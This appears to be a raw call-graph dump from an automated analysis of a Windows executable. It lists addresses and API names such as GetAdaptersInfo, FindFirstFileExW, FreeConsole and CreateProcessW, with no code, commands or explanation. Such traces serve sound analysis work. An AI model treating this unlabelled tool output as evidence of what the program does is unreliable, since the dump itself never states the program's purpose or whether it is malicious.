7ffd92c08950 _except1 8 API calls 102560->102561 102562 7ffd92bf0985 102561->102562 102562->102423 102727 7ffd92c9d720 102635->102727 102638 7ffd92c04450 12 API calls 102639 7ffd92beea04 102638->102639 102640 7ffd92bffc80 19 API calls 102639->102640 102641 7ffd92beea2d 102640->102641 102642 7ffd92bfc9f0 19 API calls 102641->102642 102643 7ffd92beea38 102642->102643 102644 7ffd92be96b0 17 API calls 102643->102644 102645 7ffd92beea43 102644->102645 102646 7ffd92beea60 delete 102645->102646 102647 7ffd92be99c0 _Receive_impl 8 API calls 102645->102647 102646->102478 102647->102646 102741 7ffd92bfc620 102648->102741 102654 7ffd92c08cf0 new 4 API calls 102656 7ffd92c01f28 102654->102656 102655 7ffd92c01faa 102657 7ffd92be96b0 17 API calls 102655->102657 102773 7ffd92beded0 19 API calls new 102656->102773 102660 7ffd92c01fb4 102657->102660 102659 7ffd92c01f62 102770 7ffd92c0b190 102659->102770 102661 7ffd92c01fce delete 102660->102661 102774 7ffd92c01430 8 API calls 3 library calls 102660->102774 102663 7ffd92c08950 _except1 8 API calls 102661->102663 102664 7ffd92beff79 102663->102664 102664->102494 102664->102516 102668 7ffd92c01ad4 102665->102668 102666 7ffd92c0ae10 __std_fs_code_page 3 API calls 102667 7ffd92c01b46 102666->102667 102669 7ffd92c08cf0 new 4 API calls 102667->102669 102668->102666 102670 7ffd92c01b68 102669->102670 102671 7ffd92c01c1e 102670->102671 102672 7ffd92c01c44 102670->102672 102827 7ffd92c0aec0 WideCharToMultiByte WideCharToMultiByte GetLastError WideCharToMultiByte GetLastError 102670->102827 102671->102503 102831 7ffd92bea4c0 19 API calls 2 library calls 102672->102831 102675 7ffd92c01bb4 102676 7ffd92c01c4a 102675->102676 102680 7ffd92c01bcf 102675->102680 102828 7ffd92bffb10 19 API calls 2 library calls 102675->102828 102832 7ffd92bea840 19 API calls std::_Xinvalid_argument 102676->102832 102829 7ffd92c0aec0 WideCharToMultiByte WideCharToMultiByte GetLastError WideCharToMultiByte GetLastError 102680->102829 102682 7ffd92c01c13 102682->102671 102830 7ffd92bea840 19 API calls std::_Xinvalid_argument 102682->102830 102686 7ffd92beca0c 102684->102686 102685 7ffd92c04260 12 API calls 102687 7ffd92becb64 102685->102687 102686->102685 102687->102503 102696 7ffd92bedaad 102688->102696 102706 7ffd92bedaf6 102688->102706 102689 7ffd92bedb89 102691 7ffd92bedb9a 102689->102691 102692 7ffd92bedbb8 102689->102692 102690 7ffd92bedbda 102693 7ffd92c0b150 __std_fs_directory_iterator_advance 2 API calls 102690->102693 102694 7ffd92bff710 17 API calls 102691->102694 102833 7ffd92c07c90 20 API calls 2 library calls 102692->102833 102697 7ffd92bedbe8 102693->102697 102698 7ffd92bedbb1 102694->102698 102700 7ffd92c0b230 22 API calls 102696->102700 102696->102706 102704 7ffd92c0b150 __std_fs_directory_iterator_advance 2 API calls 102697->102704 102711 7ffd92bedbd6 102697->102711 102699 7ffd92bed6e0 24 API calls 102698->102699 102699->102711 102700->102706 102701 7ffd92bede37 102834 7ffd92bed830 19 API calls delete 102701->102834 102703 7ffd92c08950 _except1 8 API calls 102705 7ffd92bede56 102703->102705 102704->102697 102705->102503 102706->102689 102706->102690 102707 7ffd92bedb2f 102706->102707 102707->102703 102708 7ffd92bff710 17 API calls 102708->102711 102709 7ffd92c0b190 FindClose __std_fs_close_handle 102709->102711 102710 7ffd92be96b0 17 API calls 102710->102711 102711->102701 102711->102707 102711->102708 102711->102709 102711->102710 102712 7ffd92bedebd 102711->102712 102715 7ffd92c0b150 FindNextFileW GetLastError __std_fs_directory_iterator_advance 102711->102715 102835 7ffd92c01510 10 API calls 3 library calls 102712->102835 102714 7ffd92bedec2 102715->102711 102716->102503 102717->102525 102719 7ffd92bed629 102718->102719 102836 7ffd92bfcb90 12 API calls 102719->102836 102721 7ffd92bed63e 102837 7ffd92bece30 24 API calls 2 library calls 102721->102837 102723 7ffd92bed660 102724 7ffd92c69dd0 std::_Xinvalid_argument 2 API calls 102723->102724 102725 7ffd92bed671 102724->102725 102726->102516 102730 7ffd92c9ce40 102727->102730 102729 7ffd92bee9c0 102729->102638 102732 7ffd92c9ce51 strrchr 102730->102732 102731 7ffd92c9ceb3 102731->102729 102732->102731 102738 7ffd92ca4710 EnterCriticalSection 102732->102738 102734 7ffd92c9cfba 102739 7ffd92c9cfe0 50 API calls 2 library calls 102734->102739 102736 7ffd92c9cfc5 102740 7ffd92ca47a0 LeaveCriticalSection 102736->102740 102738->102734 102739->102736 102740->102731 102742 7ffd92bfc667 102741->102742 102743 7ffd92bfc741 102742->102743 102744 7ffd92bfc67d 102742->102744 102775 7ffd92be9fe0 10 API calls std::_Xinvalid_argument 102743->102775 102746 7ffd92c08cf0 new 4 API calls 102744->102746 102748 7ffd92bfc691 102746->102748 102747 7ffd92bfc746 102749 7ffd92be9d50 Concurrency::cancel_current_task 2 API calls 102747->102749 102748->102747 102750 7ffd92bfc6c8 102748->102750 102755 7ffd92bfc6a6 memcpy_s 102748->102755 102751 7ffd92bfc74c 102749->102751 102753 7ffd92c07e50 4 API calls 102750->102753 102752 7ffd92c08950 _except1 8 API calls 102754 7ffd92bfc70a 102752->102754 102753->102755 102756 7ffd92bed6e0 102754->102756 102755->102752 102757 7ffd92bed709 102756->102757 102758 7ffd92bed7fb 102757->102758 102776 7ffd92c01c60 102757->102776 102758->102654 102758->102659 102763 7ffd92be96b0 17 API calls 102764 7ffd92bed76b 102763->102764 102766 7ffd92bed785 delete 102764->102766 102802 7ffd92c01430 8 API calls 3 library calls 102764->102802 102794 7ffd92c0b1c0 102766->102794 102768 7ffd92bed7c7 102768->102758 102799 7ffd92c0b150 FindNextFileW 102768->102799 102771 7ffd92c0b1a1 FindClose 102770->102771 102772 7ffd92c0b1b0 102770->102772 102771->102772 102772->102655 102773->102659 102774->102661 102777 7ffd92c01c8a 102776->102777 102803 7ffd92c04260 102777->102803 102780 7ffd92bec580 102782 7ffd92bec59d 102780->102782 102781 7ffd92bec6ab 102783 7ffd92bec6d4 102781->102783 102786 7ffd92bec6ff 102781->102786 102782->102781 102792 7ffd92bec68a 102782->102792 102784 7ffd92bec765 102783->102784 102785 7ffd92bec6e4 102783->102785 102825 7ffd92c01510 10 API calls 3 library calls 102784->102825 102820 7ffd92bfc510 102785->102820 102786->102785 102819 7ffd92bfc300 19 API calls 2 library calls 102786->102819 102790 7ffd92bec695 102790->102763 102791 7ffd92bec76a 102818 7ffd92becb80 19 API calls 2 library calls 102792->102818 102795 7ffd92c0b190 __std_fs_close_handle FindClose 102794->102795 102796 7ffd92c0b1e0 FindFirstFileExW 102795->102796 102797 7ffd92c0b220 GetLastError 102796->102797 102798 7ffd92c0b21c 102796->102798 102797->102798 102798->102768 102800 7ffd92c0b172 102799->102800 102801 7ffd92c0b176 GetLastError 102799->102801 102800->102768 102801->102800 102802->102766 102804 7ffd92c0429b 102803->102804 102805 7ffd92c04374 102803->102805 102806 7ffd92c08cf0 new 4 API calls 102804->102806 102817 7ffd92be9fe0 10 API calls std::_Xinvalid_argument 102805->102817 102808 7ffd92c042af 102806->102808 102809 7ffd92c04379 102808->102809 102812 7ffd92c042f7 102808->102812 102814 7ffd92c042c7 memcpy_s 102808->102814 102810 7ffd92be9d50 Concurrency::cancel_current_task 2 API calls 102809->102810 102811 7ffd92c0437f 102810->102811 102813 7ffd92c07e50 4 API calls 102812->102813 102813->102814 102815 7ffd92c08950 _except1 8 API calls 102814->102815 102816 7ffd92bed754 102815->102816 102816->102780 102818->102790 102819->102785 102821 7ffd92bfc574 102820->102821 102824 7ffd92bfc52f memcpy_s 102820->102824 102826 7ffd92c040f0 19 API calls 2 library calls 102821->102826 102823 7ffd92bfc58a 102823->102790 102824->102790 102825->102791 102826->102823 102827->102675 102828->102680 102829->102682 102831->102676 102833->102698 102834->102707 102835->102714 102836->102721 102837->102723 102843 7ffd92c02399 102838->102843 102839 7ffd92be9df0 17 API calls 102840 7ffd92c026f1 102839->102840 102841 7ffd92c0a500 std::_Lockit::_Lockit 7 API calls 102840->102841 102842 7ffd92c02708 102841->102842 102844 7ffd92c0a5e0 std::_Lockit::~_Lockit 2 API calls 102842->102844 102843->102839 102845 7ffd92c0271a 102844->102845 102846 7ffd92c0a500 std::_Lockit::_Lockit 7 API calls 102845->102846 102847 7ffd92c02729 102846->102847 102848 7ffd92c0a5e0 std::_Lockit::~_Lockit 2 API calls 102847->102848 102849 7ffd92c0273b 102848->102849 102850 7ffd92c0a500 std::_Lockit::_Lockit 7 API calls 102849->102850 102851 7ffd92c0274a 102850->102851 102852 7ffd92c0a5e0 std::_Lockit::~_Lockit 2 API calls 102851->102852 102853 7ffd92c0275c 102852->102853 102854 7ffd92c08950 _except1 8 API calls 102853->102854 102855 7ffd92bf0956 102854->102855 102855->102557 103357 7ffd92c19b6c 103358 7ffd92c19b7b 103357->103358 103363 7ffd92c19b9b 103357->103363 103359 7ffd92c19b8d 103358->103359 103360 7ffd92c1a900 55 API calls 103358->103360 103361 7ffd92c18790 70 API calls 103359->103361 103360->103359 103361->103363 103364 7ffd92c19bb8 103363->103364 103387 7ffd92c177e0 53 API calls 103363->103387 103377 7ffd92c18c30 103364->103377 103388 7ffd92c281f0 10 API calls _except1 103364->103388 103365 7ffd92c1a900 55 API calls 103365->103377 103368 7ffd92c19f08 103369 7ffd92c19c6e 103370 7ffd92c19cb2 103369->103370 103371 7ffd92c19c92 103369->103371 103369->103377 103373 7ffd92c19cd7 103370->103373 103374 7ffd92c19cb7 103370->103374 103389 7ffd92c26f90 53 API calls 2 library calls 103371->103389 103379 7ffd92c19d01 103373->103379 103380 7ffd92c19d14 103373->103380 103390 7ffd92c26f90 53 API calls 2 library calls 103374->103390 103377->103365 103377->103368 103381 7ffd92c18790 70 API calls 103377->103381 103384 7ffd92c22320 61 API calls 103377->103384 103385 7ffd92c26f90 53 API calls 103377->103385 103386 7ffd92c281f0 10 API calls _except1 103377->103386 103393 7ffd92c177e0 53 API calls 103377->103393 103394 7ffd92c36260 57 API calls 103377->103394 103391 7ffd92c26f90 53 API calls 2 library calls 103379->103391 103380->103377 103392 7ffd92c26f90 53 API calls 2 library calls 103380->103392 103381->103377 103384->103377 103385->103377 103386->103377 103387->103364 103388->103369 103389->103377 103390->103377 103391->103377 103392->103377 103393->103377 103394->103377 103395 7ffd92c0910f 103400 7ffd92c09960 103395->103400 103397 7ffd92c09127 103398 7ffd92c0911b 103398->103397 103404 7ffd92c69db0 DeleteCriticalSection TlsFree __vcrt_uninitialize_locks __vcrt_uninitialize_ptd 103398->103404 103401 7ffd92c099f8 103400->103401 103402 7ffd92c08950 _except1 8 API calls 103401->103402 103403 7ffd92c09cff 103402->103403 103403->103398 103404->103397 103405 7ffd92beed05 103409 7ffd92beed0a 103405->103409 103406 7ffd92c0ae10 __std_fs_code_page 3 API calls 103407 7ffd92beed5d 103406->103407 103408 7ffd92bec1f0 21 API calls 103407->103408 103410 7ffd92beed79 103408->103410 103409->103406 103411 7ffd92c01e80 24 API calls 103410->103411 103412 7ffd92beed99 103411->103412 103413 7ffd92bef290 103412->103413 103414 7ffd92bef3ae 103412->103414 103415 7ffd92c04450 12 API calls 103413->103415 103416 7ffd92bed610 24 API calls 103414->103416 103417 7ffd92bef2b5 103415->103417 103418 7ffd92bef3c1 103416->103418 103419 7ffd92be96b0 17 API calls 103417->103419 103420 7ffd92c04450 12 API calls 103418->103420 103421 7ffd92bef2c2 103419->103421 103422 7ffd92bef444 103420->103422 103424 7ffd92bef2e5 delete 103421->103424 103426 7ffd92be99c0 _Receive_impl 8 API calls 103421->103426 103423 7ffd92bee9a0 54 API calls 103422->103423 103425 7ffd92bef451 103423->103425 103428 7ffd92be96b0 17 API calls 103424->103428 103427 7ffd92beeaa0 80 API calls 103425->103427 103426->103424 103429 7ffd92bef45e 103427->103429 103430 7ffd92bef320 103428->103430 103431 7ffd92befa30 103429->103431 103435 7ffd92c0ae10 __std_fs_code_page 3 API calls 103429->103435 103432 7ffd92bef33d delete 103430->103432 103434 7ffd92be99c0 _Receive_impl 8 API calls 103430->103434 103433 7ffd92c04450 12 API calls 103431->103433 103439 7ffd92c08950 _except1 8 API calls 103432->103439 103436 7ffd92befa55 103433->103436 103434->103432 103437 7ffd92bef4fd 103435->103437 103438 7ffd92be96b0 17 API calls 103436->103438 103440 7ffd92bec1f0 21 API calls 103437->103440 103441 7ffd92befa62 103438->103441 103442 7ffd92bef374 103439->103442 103443 7ffd92bef519 103440->103443 103444 7ffd92befa85 delete 103441->103444 103446 7ffd92be99c0 _Receive_impl 8 API calls 103441->103446 103445 7ffd92c01e80 24 API calls 103443->103445 103450 7ffd92be96b0 17 API calls 103444->103450 103447 7ffd92bef539 103445->103447 103446->103444 103447->103431 103448 7ffd92befb4e 103447->103448 103449 7ffd92bed610 24 API calls 103448->103449 103451 7ffd92befb61 103449->103451 103452 7ffd92befac0 103450->103452 103453 7ffd92befadd delete 103452->103453 103454 7ffd92be99c0 _Receive_impl 8 API calls 103452->103454 103455 7ffd92c08950 _except1 8 API calls 103453->103455 103454->103453 103456 7ffd92befb14 103455->103456 103457 7ffd92c06640 103458 7ffd92c08cf0 new 4 API calls 103457->103458 103459 7ffd92c06680 103458->103459 103471 7ffd92c06570 103459->103471 103461 7ffd92c068d7 103462 7ffd92c08950 _except1 8 API calls 103461->103462 103463 7ffd92c068fa 103462->103463 103464 7ffd92c06912 103475 7ffd92be9fe0 10 API calls std::_Xinvalid_argument 103464->103475 103467 7ffd92c07e50 4 API calls 103469 7ffd92c066ae memcpy_s 103467->103469 103468 7ffd92c06570 24 API calls 103468->103469 103469->103461 103469->103464 103469->103467 103469->103468 103470 7ffd92be99c0 _Receive_impl 8 API calls 103469->103470 103470->103469 103472 7ffd92c06586 103471->103472 103473 7ffd92c065a3 103471->103473 103472->103473 103476 7ffd92bfaa80 103472->103476 103473->103469 103477 7ffd92bfaa95 103476->103477 103478 7ffd92bfaaa4 103477->103478 103481 7ffd92bfa740 103477->103481 103478->103473 103482 7ffd92bfa777 103481->103482 103484 7ffd92bfa7eb 103482->103484 103485 7ffd92bfa80d 103482->103485 103495 7ffd92bfa787 delete 103482->103495 103483 7ffd92c08950 _except1 8 API calls 103486 7ffd92bfa992 103483->103486 103501 7ffd92c98d40 103484->103501 103488 7ffd92c08cf0 new 4 API calls 103485->103488 103486->103473 103489 7ffd92bfa82c 103488->103489 103490 7ffd92c98d40 5 API calls 103489->103490 103492 7ffd92bfa857 memcpy_s 103490->103492 103497 7ffd92bfaa28 103492->103497 103498 7ffd92bfa93a 103492->103498 103500 7ffd92c98d40 5 API calls 103492->103500 103511 7ffd92bff8f0 19 API calls 2 library calls 103492->103511 103493 7ffd92be96b0 17 API calls 103494 7ffd92bfa948 103493->103494 103494->103495 103496 7ffd92be99c0 _Receive_impl 8 API calls 103494->103496 103495->103483 103496->103495 103497->103498 103512 7ffd92c9b350 EnterCriticalSection LeaveCriticalSection Concurrency::details::ContextBase::GetWorkQueueIdentity 103497->103512 103498->103493 103500->103492 103503 7ffd92c98d63 Concurrency::details::ContextBase::GetWorkQueueIdentity Concurrency::details::_Scheduler::_Scheduler __crt_scoped_stack_ptr 103501->103503 103502 7ffd92c98dd6 103502->103495 103503->103502 103504 7ffd92c91b90 Concurrency::details::ContextBase::GetWorkQueueIdentity EnterCriticalSection 103503->103504 103508 7ffd92c98e2e Concurrency::details::ContextBase::GetWorkQueueIdentity _fread_nolock std::_Fiopen 103504->103508 103505 7ffd92c98fbc Concurrency::details::ContextBase::GetWorkQueueIdentity 103513 7ffd92c98bc0 103505->103513 103507 7ffd92c98fce Concurrency::details::ContextBase::GetWorkQueueIdentity 103518 7ffd92c91bd0 LeaveCriticalSection Concurrency::details::ContextBase::GetWorkQueueIdentity Concurrency::details::_Scheduler::_Scheduler 103507->103518 103508->103505 103517 7ffd92ce59c0 RtlUnwind 103508->103517 103511->103492 103512->103497 103514 7ffd92c98bd8 Concurrency::details::ContextBase::GetWorkQueueIdentity Concurrency::details::_Scheduler::_Scheduler __crt_scoped_stack_ptr 103513->103514 103516 7ffd92c98c4b Concurrency::details::ContextBase::GetWorkQueueIdentity 103514->103516 103519 7ffd92cc5410 103514->103519 103516->103507 103517->103505 103518->103502 103520 7ffd92cc5428 Concurrency::details::_Scheduler::_Scheduler 103519->103520 103523 7ffd92cc49e0 103520->103523 103522 7ffd92cc5430 103522->103516 103524 7ffd92cc49f9 Concurrency::details::ContextBase::GetWorkQueueIdentity _fread_nolock __create_locale std::_Fiopen __crt_scoped_stack_ptr 103523->103524 103526 7ffd92cc4a62 Concurrency::details::ContextBase::GetWorkQueueIdentity _fread_nolock __create_locale 103524->103526 103527 7ffd92ccb590 103524->103527 103526->103522 103528 7ffd92ccb5ad _dosmaperr 103527->103528 103529 7ffd92ccb5cd 103527->103529 103528->103526 103529->103528 103533 7ffd92cc3a10 EnterCriticalSection 103529->103533 103532 7ffd92ccb822 _dosmaperr 103534 7ffd92cc3b60 LeaveCriticalSection 103532->103534 103533->103532 103534->103528 103535 7ffd92c095be 103536 7ffd92c095cf __scrt_acquire_startup_lock 103535->103536 103537 7ffd92c095c5 103535->103537 103539 7ffd92c095e6 103536->103539 103541 7ffd92c095f2 103536->103541 103561 7ffd92c09d50 7 API calls pre_c_initialization 103537->103561 103562 7ffd92c09d50 7 API calls pre_c_initialization 103539->103562 103542 7ffd92c0961c 103541->103542 103544 7ffd92c095f0 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 103541->103544 103551 7ffd92ca0e90 103541->103551 103556 7ffd92c09750 103544->103556 103552 7ffd92ca0eaa 103551->103552 103553 7ffd92ca0ef5 103552->103553 103565 7ffd92be1160 103552->103565 103568 7ffd92be1000 SHGetFolderPathW 103552->103568 103553->103544 103601 7ffd92c9fdd0 103556->103601 103558 7ffd92c09759 103604 7ffd92bf8130 FreeConsole 103558->103604 103561->103536 103562->103544 103584 7ffd92bec130 SHGetFolderPathW 103565->103584 103569 7ffd92be1052 103568->103569 103570 7ffd92c04260 12 API calls 103569->103570 103571 7ffd92be1089 103570->103571 103572 7ffd92bfc510 19 API calls 103571->103572 103573 7ffd92be10a1 103572->103573 103590 7ffd92bfc590 103573->103590 103576 7ffd92be96b0 17 API calls 103577 7ffd92be10bb 103576->103577 103578 7ffd92be10d5 delete 103577->103578 103598 7ffd92c01430 8 API calls 3 library calls 103577->103598 103599 7ffd92c093e0 12 API calls atexit 103578->103599 103581 7ffd92be1108 103582 7ffd92c08950 _except1 8 API calls 103581->103582 103583 7ffd92be1118 103582->103583 103583->103552 103585 7ffd92bec187 103584->103585 103585->103585 103586 7ffd92c04260 12 API calls 103585->103586 103587 7ffd92bec1b7 103586->103587 103588 7ffd92c08950 _except1 8 API calls 103587->103588 103589 7ffd92be1172 103588->103589 103591 7ffd92c08cf0 new 4 API calls 103590->103591 103592 7ffd92bfc5c1 103591->103592 103593 7ffd92bfc5d2 103592->103593 103594 7ffd92bfc5df 103592->103594 103600 7ffd92be9f60 17 API calls 3 library calls 103593->103600 103596 7ffd92be96b0 17 API calls 103594->103596 103597 7ffd92be10b0 103596->103597 103597->103576 103598->103578 103599->103581 103600->103597 103653 7ffd92c9eda0 103601->103653 103658 7ffd92bee600 103604->103658 103607 7ffd92c062c0 64 API calls 103608 7ffd92bf819c 103607->103608 103609 7ffd92c022d0 94 API calls 103608->103609 103610 7ffd92bf81a4 103609->103610 103675 7ffd92c99430 103610->103675 103613 7ffd92c04450 12 API calls 103614 7ffd92bf81e8 103613->103614 103615 7ffd92c04450 12 API calls 103614->103615 103616 7ffd92bf8218 103615->103616 103617 7ffd92bfcbd0 12 API calls 103616->103617 103618 7ffd92bf822b 103617->103618 103619 7ffd92c04450 12 API calls 103618->103619 103620 7ffd92bf8266 103619->103620 103621 7ffd92bf2030 188 API calls 103620->103621 103622 7ffd92bf827e 103621->103622 103623 7ffd92be96b0 17 API calls 103622->103623 103624 7ffd92bf8289 delete 103623->103624 103625 7ffd92bfcbd0 12 API calls 103624->103625 103626 7ffd92bf82e4 103625->103626 103627 7ffd92bfcbd0 12 API calls 103626->103627 103628 7ffd92bf82fe 103627->103628 103629 7ffd92c08cf0 new 4 API calls 103628->103629 103630 7ffd92bf835d 103629->103630 103631 7ffd92c93ff0 12 API calls 103630->103631 103632 7ffd92bf83ef 103631->103632 103633 7ffd92be96b0 17 API calls 103632->103633 103634 7ffd92bf83fb 103633->103634 103635 7ffd92be99c0 _Receive_impl 8 API calls 103634->103635 103636 7ffd92bf8418 delete 103634->103636 103635->103636 103678 7ffd92c93a30 48 API calls _mbsset_s 103636->103678 103638 7ffd92bf8453 103639 7ffd92be96b0 17 API calls 103638->103639 103640 7ffd92bf845e 103639->103640 103641 7ffd92bf847e delete 103640->103641 103642 7ffd92be99c0 _Receive_impl 8 API calls 103640->103642 103643 7ffd92be96b0 17 API calls 103641->103643 103642->103641 103644 7ffd92bf84b6 103643->103644 103645 7ffd92bf84dc delete 103644->103645 103646 7ffd92be99c0 _Receive_impl 8 API calls 103644->103646 103647 7ffd92be96b0 17 API calls 103645->103647 103646->103645 103648 7ffd92bf851d 103647->103648 103649 7ffd92be99c0 _Receive_impl 8 API calls 103648->103649 103650 7ffd92bf8543 delete 103648->103650 103649->103650 103651 7ffd92c08950 _except1 8 API calls 103650->103651 103655 7ffd92c9edab strrchr 103653->103655 103654 7ffd92c9edc0 103654->103558 103655->103654 103657 7ffd92c9ede0 50 API calls 2 library calls 103655->103657 103657->103654 103679 7ffd92c67070 103658->103679 103661 7ffd92bee727 103663 7ffd92c04450 12 API calls 103661->103663 103662 7ffd92bee652 memcpy_s 103681 7ffd92bfb710 63 API calls std::_Xinvalid_argument 103662->103681 103664 7ffd92bee725 103663->103664 103666 7ffd92c08950 _except1 8 API calls 103664->103666 103667 7ffd92bee761 103666->103667 103667->103607 103668 7ffd92bee70d 103683 7ffd92bff580 19 API calls new 103668->103683 103670 7ffd92bee71a 103684 7ffd92bee780 8 API calls _Receive_impl 103670->103684 103672 7ffd92c02020 64 API calls 103673 7ffd92bee66e _Smanip 103672->103673 103673->103668 103673->103672 103682 7ffd92bfc010 87 API calls std::_Xinvalid_argument 103673->103682 103685 7ffd92c99000 103675->103685 103678->103638 103680 7ffd92bee610 GetAdaptersInfo 103679->103680 103680->103661 103680->103662 103681->103673 103682->103673 103683->103670 103684->103664 103686 7ffd92c9902a Concurrency::details::_Scheduler::_Scheduler std::_Container_base12::~_Container_base12 103685->103686 103700 7ffd92c99360 103686->103700 103691 7ffd92c990af Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method 103698 7ffd92c990c0 type_info::_name_internal_method 103691->103698 103711 7ffd92c99330 103691->103711 103693 7ffd92c08950 _except1 8 API calls 103695 7ffd92bf81b0 103693->103695 103695->103613 103696 7ffd92c99138 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method 103699 7ffd92c99235 103696->103699 103708 7ffd92c993b0 103696->103708 103698->103693 103699->103698 103714 7ffd92c993f0 58 API calls 103699->103714 103715 7ffd92c9d690 103700->103715 103703 7ffd92c8ff50 103704 7ffd92c8ff6d 103703->103704 103705 7ffd92c8ff81 103703->103705 103704->103705 103706 7ffd92c8ff87 103704->103706 103705->103691 103705->103696 103739 7ffd92c91760 17 API calls _invoke_watson_if_error 103706->103739 103740 7ffd92cc6bc0 103708->103740 103841 7ffd92cad060 103711->103841 103713 7ffd92c99352 103713->103698 103714->103698 103718 7ffd92c9cb60 103715->103718 103725 7ffd92ca4710 EnterCriticalSection 103718->103725 103720 7ffd92c9cb8a 103726 7ffd92c9cbd0 103720->103726 103722 7ffd92c9cbb6 103732 7ffd92ca47a0 LeaveCriticalSection 103722->103732 103724 7ffd92c9905e 103724->103703 103725->103720 103727 7ffd92c9cbf0 103726->103727 103728 7ffd92c9cc52 103727->103728 103733 7ffd92c9cfe0 50 API calls 2 library calls 103727->103733 103728->103722 103730 7ffd92c9cd62 Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock strrchr 103730->103728 103734 7ffd92c91110 103730->103734 103732->103724 103733->103730 103735 7ffd92c91130 103734->103735 103736 7ffd92c9112e 103734->103736 103738 7ffd92c91760 17 API calls _invoke_watson_if_error 103735->103738 103736->103728 103738->103736 103739->103705 103743 7ffd92cc5520 103740->103743 103742 7ffd92c993e9 103742->103699 103744 7ffd92cc5545 Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock Concurrency::details::ContextBase::GetWorkQueueIdentity Concurrency::details::_Scheduler::_Scheduler type_info::_name_internal_method __CxxFrameHandler2 103743->103744 103749 7ffd92c91110 _invoke_watson_if_error 17 API calls 103744->103749 103754 7ffd92cc596b Concurrency::details::_Scheduler::_Scheduler type_info::_name_internal_method __crt_unique_heap_ptr 103744->103754 103761 7ffd92cc55a7 type_info::_name_internal_method 103744->103761 103745 7ffd92cc5b66 103746 7ffd92c99330 20 API calls 103745->103746 103747 7ffd92cc5b83 103746->103747 103747->103761 103762 7ffd92cc5f10 103747->103762 103751 7ffd92cc5a5c Concurrency::details::ContextBase::GetWorkQueueIdentity __CxxFrameHandler2 103749->103751 103750 7ffd92cc5bcf Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock Concurrency::details::ContextBase::GetWorkQueueIdentity strrchr Concurrency::details::_Scheduler::_Scheduler type_info::_name_internal_method 103752 7ffd92c91110 _invoke_watson_if_error 17 API calls 103750->103752 103750->103761 103753 7ffd92c91110 _invoke_watson_if_error 17 API calls 103751->103753 103755 7ffd92cc5cb3 Concurrency::details::ContextBase::GetWorkQueueIdentity 103752->103755 103753->103754 103754->103745 103754->103750 103756 7ffd92c91110 _invoke_watson_if_error 17 API calls 103755->103756 103755->103761 103757 7ffd92cc5d94 Concurrency::details::ContextBase::GetWorkQueueIdentity 103756->103757 103758 7ffd92c99330 20 API calls 103757->103758 103759 7ffd92cc5dc6 Concurrency::details::ContextBase::GetWorkQueueIdentity 103758->103759 103760 7ffd92cc5f10 56 API calls 103759->103760 103759->103761 103760->103761 103761->103742 103763 7ffd92cc5f36 Concurrency::details::_Scheduler::_Scheduler std::_Container_base12::~_Container_base12 103762->103763 103767 7ffd92cc5faa _dosmaperr type_info::_name_internal_method 103763->103767 103801 7ffd92cc6680 103763->103801 103765 7ffd92cc61dd Concurrency::details::_Scheduler::_Scheduler std::_Container_base12::~_Container_base12 103765->103767 103804 7ffd92cc6b30 103765->103804 103767->103761 103768 7ffd92cc6251 _dosmaperr Concurrency::details::ContextBase::GetWorkQueueIdentity 103768->103767 103808 7ffd92cc5e70 103768->103808 103770 7ffd92cc6405 Concurrency::details::_Scheduler::_Scheduler 103771 7ffd92cc643a GetLastError 103770->103771 103772 7ffd92cc6492 103770->103772 103773 7ffd92cc6447 _dosmaperr 103771->103773 103774 7ffd92cc64a8 103772->103774 103783 7ffd92cc649c 103772->103783 103811 7ffd92cafe80 103773->103811 103775 7ffd92cc64b6 WaitForSingleObject GetExitCodeProcess 103774->103775 103776 7ffd92cc6591 103774->103776 103778 7ffd92cc6534 GetLastError 103775->103778 103779 7ffd92cc64e3 103775->103779 103780 7ffd92cc65e8 103776->103780 103781 7ffd92cc659b 103776->103781 103782 7ffd92cc6541 _dosmaperr 103778->103782 103785 7ffd92cafe80 FindCloseChangeNotification 103779->103785 103795 7ffd92cafe80 FindCloseChangeNotification 103780->103795 103786 7ffd92cafe80 FindCloseChangeNotification 103781->103786 103792 7ffd92cafe80 FindCloseChangeNotification 103782->103792 103787 7ffd92cafe80 FindCloseChangeNotification 103783->103787 103789 7ffd92cc64fd 103785->103789 103790 7ffd92cc65b1 103786->103790 103793 7ffd92cc6640 103787->103793 103797 7ffd92cafe80 FindCloseChangeNotification 103793->103797 103798 7ffd92cc6604 103795->103798 103797->103767 103814 7ffd92ce0e50 103801->103814 103805 7ffd92cc6b65 _wcsupr_s 103804->103805 103817 7ffd92cc54c0 103805->103817 103821 7ffd92ce0e90 103808->103821 103810 7ffd92cc5f09 103810->103770 103837 7ffd92cb0110 103811->103837 103815 7ffd92ce01f0 __CxxFrameHandler2 50 API calls 103814->103815 103816 7ffd92cc66bd 103815->103816 103816->103765 103818 7ffd92cc54e5 GetLocaleNameFromLanguage 103817->103818 103819 7ffd92cc5470 EnterCriticalSection LeaveCriticalSection 103818->103819 103820 7ffd92cc5517 103819->103820 103820->103768 103822 7ffd92ce0eb8 _Adl_verify_range 103821->103822 103823 7ffd92c93d50 _Adl_verify_range 7 API calls 103822->103823 103824 7ffd92ce0ed7 103823->103824 103825 7ffd92c93c20 _Adl_verify_range GetLastError GetLastError MultiByteToWideChar 103824->103825 103826 7ffd92ce0eef 103825->103826 103827 7ffd92c93d50 _Adl_verify_range 7 API calls 103826->103827 103832 7ffd92ce0efa std::_Container_base12::~_Container_base12 103826->103832 103828 7ffd92ce0f37 103827->103828 103829 7ffd92c93c20 _Adl_verify_range GetLastError GetLastError MultiByteToWideChar 103828->103829 103830 7ffd92ce0f4f 103829->103830 103831 7ffd92c93d50 _Adl_verify_range 7 API calls 103830->103831 103830->103832 103836 7ffd92ce0fc3 _Adl_verify_range 103830->103836 103833 7ffd92ce0fab 103831->103833 103832->103810 103834 7ffd92c93c20 _Adl_verify_range GetLastError GetLastError MultiByteToWideChar 103833->103834 103834->103836 103835 7ffd92ce1037 CreateProcessW 103835->103832 103836->103832 103836->103835 103838 7ffd92cb011e try_get_function 103837->103838 103839 7ffd92cb0150 FindCloseChangeNotification 103838->103839 103840 7ffd92cb0128 try_get_function 103838->103840 103839->103840 103842 7ffd92cad075 103841->103842 103843 7ffd92cad082 _Adl_verify_range 103841->103843 103851 7ffd92cc7960 10 API calls 2 library calls 